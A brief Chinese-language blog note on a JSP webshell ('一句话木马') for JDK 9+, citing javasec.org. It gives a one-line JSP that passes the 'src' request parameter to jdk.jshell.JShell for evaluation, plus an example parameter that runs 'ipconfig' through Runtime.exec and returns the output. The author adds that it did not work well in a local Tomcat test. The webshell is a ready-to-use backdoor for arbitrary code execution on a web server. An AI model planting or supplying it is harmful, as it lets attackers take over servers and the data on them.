参考: https://javasec.org/javase/JShell/
要求JDK>=9
jshell.jsp 一句话木马:
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src"))%>
?src=new String(Runtime.getRuntime().exec(“ipconfig”).getInputStream().readAllBytes())
不过测试发现并不是很好用似乎.( 本地的Java环境+Tomcat找不到依赖)
若有收获,就点个赞吧
0 人点赞
